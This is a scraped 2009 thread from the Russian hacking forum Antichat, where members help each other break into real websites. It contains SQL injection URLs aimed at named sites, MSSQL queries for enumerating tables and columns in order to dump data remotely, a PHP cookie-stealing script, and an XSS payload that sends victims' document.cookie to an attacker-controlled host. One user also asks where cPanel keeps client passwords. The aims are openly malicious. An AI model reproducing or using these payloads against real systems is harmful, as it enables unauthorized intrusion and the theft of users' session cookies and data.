ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

26.02.2009, 22:49
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме: 7452489
Репутация:
1359
|
|
2Assembler
http://molod.karelia.ru/portal/page/portal/molod/main/Officially?loc=-2+union+select+1,2,3,4,5,6,7,8,9,0,1+from+news+--+
Цитата:
The Error is: java.sql.SQLException: ORA-01790: выражение должно иметь тот же тип данных, что и соответствующее выражение
ORA-01790: - база данных оракл.тут была статья от [x53]Shadow про проведение инжекта в оракл
|
|
|

26.02.2009, 22:56
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме: 2584134
Репутация:
519
|
|
а точнее здесь:
https://forum.antichat.ru/thread40576.html
|
|
|

26.02.2009, 23:28
|
|
Новичок
Регистрация: 16.02.2009
Сообщений: 10
Провел на форуме: 390969
Репутация:
8
|
|
htt p://cardz.ru/index.php?rasd=oplata&type=1'
Можете посмотреть эту скуля или нет , а то не могу понять!
|
|
|

26.02.2009, 23:30
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Sosok, нет, не скуля.
при скуле будет немного другая ошибка.
|
|
|

26.02.2009, 23:34
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме: 2584134
Репутация:
519
|
|
Sosok, это ошибка в самом скрипте, она не вызвана кавычкой...
http://cardz.ru/index.php?rasd=oplata&type=1
=
http://cardz.ru/index.php?rasd=oplata&type=1'
|
|
|

27.02.2009, 17:27
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме: 1469161
Репутация:
142
|
|
Начёт сниффера.Код взял с форума:
<?php
$date = date('d.m.y - H:i:s');
$ip = UrlDecode(getenv('REMOTE_ADDR'));
$referer = UrlDecode(getenv('HTTP_REFERER'));
$query = UrlDecode(getenv('QUERY_STRING'));
$cookie=getenv('HTTP_COOKIE');
$s = fopen("C:\Program Files\VertrigoServ\www\cookies.txt","w");
if($s) {
echo "Successfully opened!";
fputs($s,$cookie);
echo "\n";
fputs($s,$ip);
}
else {
echo "У нас праблемы...";
}
?>
Также есть XSS на одном сайте.Как нужно обратиться к скрипту,чтобы он записал данные ?
"<script%0A%0D>s=new Image();s.src="http://my_ip/sniffer.php?"+document.cookie%3B</script>
Где my_ip - мой Ip адрес).На серве лежит скрипт sniffer.php. В фаил ничего не записалось,вот я и подумал,что обращаюсь к скрипту неправильно.
|
|
|

28.02.2009, 16:14
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме: 861008
Репутация:
58
|
|
при составлении запроса в mssql inj приходится сначала кодировать в чар а потом с помощью урл код)) естественно чтоб узнать все таблы запрос будет длинным.. и обрезается(( как поступить?
|
|
|

28.02.2009, 19:18
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
кто знает где пассы клиентов в cPanel .. или каждый хостер делает свое?
|
|
|

28.02.2009, 20:32
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме: 3244717
Репутация:
1980
|
|
Сообщение от j0ker13
при составлении запроса в mssql inj приходится сначала кодировать в чар а потом с помощью урл код)) естественно чтоб узнать все таблы запрос будет длинным.. и обрезается(( как поступить?
SELECT TOP 1 TABLE_NAME FROM inofrmation_schema.TABLES WHERE TABLE_NAME NOT IN(SELECT TOP x++ TABLE_NAME FROM inofrmation_schema.TABLES ORDER BY TABLE_NAME) ORDER BY TABLE_NAME
|
|
|

28.02.2009, 23:27
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме: 861008
Репутация:
58
|
|
2razor
работает) но как можно по аналогии вытащить имена колонок?)
(SELECT TOP 1 column_NAME FROM information_schema.columns WHERE table_name='tbllogin' and column_NAME NOT IN(SELECT TOP 3 column_NAME FROM information_schema.columns ORDER BY column_NAME) ORDER BY column_NAME)
и если выводит данные из таблицы ... where id=2... почему запрос проходит без ошибок? или какие еще способы есть сдампить удаленно?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|